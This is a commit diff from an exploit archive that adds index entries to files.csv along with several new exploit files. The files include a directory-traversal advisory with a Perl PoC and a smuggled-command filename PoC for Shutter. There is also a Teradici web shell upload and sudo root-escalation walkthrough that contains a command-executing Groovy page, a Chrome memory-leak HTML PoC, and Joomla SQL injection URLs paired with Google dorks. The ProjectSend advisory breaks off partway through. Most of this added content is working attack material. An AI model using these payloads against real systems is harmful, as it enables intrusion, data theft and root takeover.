DB: 2017-02-23
13 new exploits EasyCom For PHP 4.0.0 - Buffer Overflow (PoC) EasyCom For PHP 4.0.0 - Denial of Service Google Chrome - 'layout' Out-of-Bounds Read Shutter 0.93.1 - Code Execution DiskSavvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH) Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection Joomla! Component VehicleManager 3.9 - SQL Injection Joomla! Component RealEstateManager 3.9 - SQL Injection Joomla! Component BookLibrary 3.6.1 - SQL Injection Joomla! Component MediaLibrary Basic 3.5 - SQL Injection Lock Photos Album&Videos Safe 4.3 - Directory Traversal ProjectSend r754 - Insecure Direct Object Reference Teradici Management Console 2.2.0 - Privilege Escalation
This commit is contained in:
parent
ad7bd81657
commit
c7c1c7d92e
14 changed files with 954 additions and 1 deletions
15
files.csv
15
files.csv
|
@ -5379,6 +5379,9 @@ id,file,description,date,author,platform,type,port
|
|||
41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
|
||||
41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
|
||||
41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
|
||||
41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
|
||||
41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
|
||||
41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8813,6 +8816,7 @@ id,file,description,date,author,platform,type,port
|
|||
41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
|
||||
41349,platforms/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Privilege Escalation",2017-02-14,"Kacper Szurek",windows,local,0
|
||||
41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
|
||||
41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15279,7 +15283,7 @@ id,file,description,date,author,platform,type,port
|
|||
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
|
||||
41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
|
||||
41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
|
||||
41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
|
||||
41146,platforms/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
|
||||
41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0
|
||||
41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
|
||||
41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0
|
||||
|
@ -15291,6 +15295,7 @@ id,file,description,date,author,platform,type,port
|
|||
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
|
||||
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
|
||||
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
|
||||
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37341,3 +37346,11 @@ id,file,description,date,author,platform,type,port
|
|||
41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
|
||||
41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
|
||||
41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
|
||||
41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41430,platforms/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41431,platforms/php/webapps/41431.txt,"Joomla! Component MediaLibrary Basic 3.5 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
|
||||
41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
|
||||
41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
205
platforms/ios/webapps/41432.txt
Executable file
205
platforms/ios/webapps/41432.txt
Executable file
|
@ -0,0 +1,205 @@
|
|||
Document Title:
|
||||
===============
|
||||
Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2032
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-02-21
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2032
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7.8
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store
|
||||
and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do
|
||||
more things in one app and manage your life better!
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/lock-photos-album-video.s/id448033053 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2017-02-21: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Galaxy Studio (Mo Wellin)
|
||||
Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A directory traversal vulnerability has been dsicovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
|
||||
The security vulnerability allows an attackers to unauthorized request and download local application files by usage of manipulated path parameters.
|
||||
|
||||
The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request
|
||||
the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path
|
||||
variables to access, download or upload arbitrary files. Remote attackers are able to access the sql-lite database file that own the web-server
|
||||
access credentials of the application. After the download the attacker is able to access the database management system file to use the credentials
|
||||
for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check
|
||||
for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application.
|
||||
The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able
|
||||
to access with the credentials the service by using a client via http protocol.
|
||||
|
||||
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8.
|
||||
Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
|
||||
vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] PRE
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] form action
|
||||
|
||||
Affected Module(s):
|
||||
[+] Web-Server File System
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Standard Request:
|
||||
http://localhost:5555/?PRE=action form
|
||||
|
||||
|
||||
PoC: Payload
|
||||
//..//..//..//..//..//..//..//..//%00
|
||||
/../../../../../../../../%00
|
||||
|
||||
|
||||
PoC: Exploitation
|
||||
http://localhost:5555/?PRE=action form=/../../../../../../../../%00
|
||||
|
||||
|
||||
PoC: Exploit
|
||||
use strict;
|
||||
use LWP::UserAgent;
|
||||
my $b = LWP::UserAgent->new();
|
||||
my $host = "localhost:5555";
|
||||
print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;
|
||||
|
||||
|
||||
--- PoC Session Logs [GET] ---
|
||||
Status: 200[OK]
|
||||
GET http://localhost:5555/?PRE=action%20form=//..//..//..//..//..//..//..//..//%00 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:5555]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Connection[keep-alive]
|
||||
Upgrade-Insecure-Requests[1]
|
||||
Response Header:
|
||||
Date[Di., 21 Feb. 2017 09:21:48 GMT]
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[0]
|
||||
|
||||
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
{
|
||||
"paths" : [
|
||||
"/Picture/Public/path/All Image/"
|
||||
],
|
||||
"folder" : "/Picture/Public/path",
|
||||
"code" : 1
|
||||
}
|
||||
... manipulated
|
||||
|
||||
{
|
||||
"paths" : [
|
||||
],
|
||||
"folder" : "/../../../../../../../../%00",
|
||||
"code" : 1
|
||||
}
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:5555/
|
||||
http://localhost:5555/?PRE
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The security vulnerability can be resolved by disallowing users to access the upper path for root privileges. Ensure that the form
|
||||
action request denies to access web-server data or application configuration files. Parse and restrict the form action parameter to
|
||||
prevent further directory traversal attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the directory traversal web vulnerability in the mobile web-server application is estimated as high. (CVSS 7.8)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
|
||||
|
||||
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
26
platforms/linux/local/41435.txt
Executable file
26
platforms/linux/local/41435.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title: Shutter user-assisted remote code execution
|
||||
# Date: 2016-12-26
|
||||
# Software Link: http://shutter-project.org/
|
||||
# Version: 0.93.1
|
||||
# Tested on: Ubuntu, Debian
|
||||
# Exploit Author: Prajith P
|
||||
# Website: http://prajith.in/
|
||||
# Author Mail: me@prajith.in
|
||||
# CVE: CVE-2016-10081
|
||||
|
||||
1. Description.
|
||||
/usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
|
||||
attackers to execute arbitrary commands via a crafted image name that is
|
||||
mishandled during a "Run a plugin" action.
|
||||
|
||||
2. Proof of concept.
|
||||
1) Rename an image to something like "$(firefox)"
|
||||
2) Open the renamed file in shutter
|
||||
3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
|
||||
|
||||
3. Solution:
|
||||
https://bugs.launchpad.net/shutter/+bug/1652600
|
||||
|
||||
|
||||
Thanks,
|
||||
Prajithh
|
66
platforms/linux/webapps/41437.txt
Executable file
66
platforms/linux/webapps/41437.txt
Executable file
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
|
||||
# Date: February 22nd, 2017
|
||||
# Exploit Author: hantwister
|
||||
# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
|
||||
# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
|
||||
# Version: 2.2.0
|
||||
|
||||
|
||||
Users that can access the Settings > Database Management page can achieve code
|
||||
execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
|
||||
|
||||
|
||||
Web Shell Upload Vulnerability Overview
|
||||
---------------------------------------
|
||||
|
||||
Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
|
||||
malicious archive with a malicious web script that extracts to the known
|
||||
directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
|
||||
it is possible to add or modify class files and XML files pertaining to the
|
||||
application.
|
||||
|
||||
|
||||
Privilege Escalation Vulnerability Overview
|
||||
-------------------------------------------
|
||||
|
||||
The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
|
||||
has sudo rights to run that file without a password. By manipulating this file,
|
||||
arbitrary code can be run as root.
|
||||
|
||||
|
||||
Exploiting The Vulnerabilities
|
||||
------------------------------
|
||||
|
||||
alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
|
||||
alice:~$ cd runasroot
|
||||
alice:~/runasroot$ msfvenom (snip) > evil
|
||||
alice:~/runasroot$ chmod a+x evil
|
||||
alice:~/runasroot$ nano modify_self_restart.sh
|
||||
|
||||
#!/bin/bash
|
||||
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
|
||||
|
||||
alice:~/runasroot$ chmod a+x modify_self_restart.sh
|
||||
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
|
||||
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>runasroot</title>
|
||||
</head>
|
||||
<body>
|
||||
<pre>
|
||||
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
|
||||
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
|
||||
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
|
||||
</pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
|
||||
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
|
||||
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
|
||||
|
||||
Now, choose to upload runasroot.archive through the Database Management page. An
|
||||
error will be displayed that it wasn't a valid archive. Now, navigate to
|
||||
https://IP/console/images/runasroot.gsp
|
29
platforms/multiple/dos/41434.html
Executable file
29
platforms/multiple/dos/41434.html
Executable file
|
@ -0,0 +1,29 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
|
||||
|
||||
Chrome bug:
|
||||
|
||||
https://bugs.chromium.org/p/chromium/issues/detail?id=671328
|
||||
|
||||
PoC:
|
||||
-->
|
||||
|
||||
<style>
|
||||
content { contain: size layout; }
|
||||
</style>
|
||||
<script>
|
||||
function leak() {
|
||||
document.execCommand("selectAll");
|
||||
opt.text = "";
|
||||
}
|
||||
</script>
|
||||
<body onload=leak()>
|
||||
<content>
|
||||
<select>
|
||||
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
|
||||
</select>
|
||||
</content>
|
||||
|
||||
<!--
|
||||
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
|
||||
-->
|
17
platforms/php/webapps/41427.txt
Executable file
17
platforms/php/webapps/41427.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component ContentMap v1.3.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_contentmap
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: https://www.turismo.eu/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/contentmap/
|
||||
# Demo: https://www.turismo.eu/itinerari.html
|
||||
# Version: 1.3.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL]
|
||||
# # # # #
|
22
platforms/php/webapps/41428.txt
Executable file
22
platforms/php/webapps/41428.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_vehiclemanager
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
|
||||
# Demo: http://ordasvit.com/joomla-vehicle-manager/
|
||||
# Version: 3.9
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
|
||||
# # # # #
|
18
platforms/php/webapps/41429.txt
Executable file
18
platforms/php/webapps/41429.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_realestatemanager
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
|
||||
# Demo: http://ordasvit.com/joomla-real-estate-manager/
|
||||
# Version: 3.9
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
|
||||
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
|
||||
# # # # #
|
18
platforms/php/webapps/41430.txt
Executable file
18
platforms/php/webapps/41430.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_booklibrary
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
|
||||
# Demo: http://ordasvit.com/joomla-book-library
|
||||
# Version: 3.6.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
|
||||
# http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
|
||||
# # # # #
|
18
platforms/php/webapps/41431.txt
Executable file
18
platforms/php/webapps/41431.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_booklibrary
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
|
||||
# Demo: http://ordasvit.com/joomla-media-library/
|
||||
# Version: 3.5
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
|
||||
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
|
||||
# # # # #
|
157
platforms/php/webapps/41433.txt
Executable file
157
platforms/php/webapps/41433.txt
Executable file
|
@ -0,0 +1,157 @@
|
|||
Document Title:
|
||||
===============
|
||||
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2031
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-02-21
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2031
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.3
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets
|
||||
you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending
|
||||
on external services or e-mail to send those files.
|
||||
|
||||
(Copy of the Homepage: http://www.projectsend.org/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2017-02-20: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
GNU GPL License
|
||||
Product: ProjectSend r754
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input.
|
||||
